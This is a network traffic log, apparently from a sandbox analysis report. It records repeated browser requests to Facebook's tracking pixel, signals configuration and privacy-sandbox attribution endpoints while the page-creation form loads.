    Source: global trafficHTTP traffic detected: GET /signals/config/221433308641448?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/1668333663438923?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__aaid=0&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU6C7UW3q327E2vwXw4BwUx60Vo1upE4W0OE2WxO0FE662y1Qw5Mx61vw4Ugao6C0lW0ny0RE2Jw8Xwn83fw6iw4vwbS1Lw7Jw7zwtU5K&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419924079772026106&__req=1&__rev=1016900551&__s=soewkf%3A5l6w24%3Ahbua9m&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585699&__user=0&dpr=1&jazoest=2982&lsd=AVrwfIkMi5Q HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /signals/config/221433308641448?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/1362649510502605?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D1668333663438923%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585714464%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26ec%3D0%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26exp%3Df1&events[1]=id%3D221433308641448%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585714466%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26ec%3D0%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26exp%3Df3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1668333663438923&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585714464&sw=1280&sh=1024&v=2.9.169&r=stable&ec=0&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&exp=f1&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source=navigation-source, triggerReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=221433308641448&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585714466&sw=1280&sh=1024&v=2.9.169&r=stable&ec=0&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D1668333663438923%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585714464%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26ec%3D0%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26exp%3Df1&events[1]=id%3D221433308641448%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585714466%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26ec%3D0%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26exp%3Df3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /signals/config/1362649510502605?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D1362649510502605%26ev%3DPageCreationOnboardingFlow%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585715428%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D0%26o%3D4126%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26tm%3D1%26exp%3Df3&events[1]=id%3D1362649510502605%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585715430%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D1%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26exp%3Df3&events[2]=id%3D1362649510502605%26ev%3DPageCreationOnboardingFlow%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585715431%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D2%26o%3D4126%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26tm%3D1%26exp%3Df3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageCreationOnboardingFlow&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585715428&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=0&o=4126&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&tm=1&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-source;navigation-sourceReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585715430&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=1&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger;navigation-sourceReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageCreationOnboardingFlow&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585715431&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=2&o=4126&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&tm=1&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger;navigation-source, event-sourceReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1668333663438923&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585714464&sw=1280&sh=1024&v=2.9.169&r=stable&ec=0&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&exp=f1&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=221433308641448&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585714466&sw=1280&sh=1024&v=2.9.169&r=stable&ec=0&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D1362649510502605%26ev%3DPageCreationOnboardingFlow%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585715428%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D0%26o%3D4126%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26tm%3D1%26exp%3Df3&events[1]=id%3D1362649510502605%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585715430%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D1%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26exp%3Df3&events[2]=id%3D1362649510502605%26ev%3DPageCreationOnboardingFlow%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585715431%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D2%26o%3D4126%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585712228%26coo%3Dfalse%26tm%3D1%26exp%3Df3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageCreationOnboardingFlow&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585715428&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=0&o=4126&ler=empty&cdl=API_unavailable&it=1727585712228&coo=false&tm=1&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
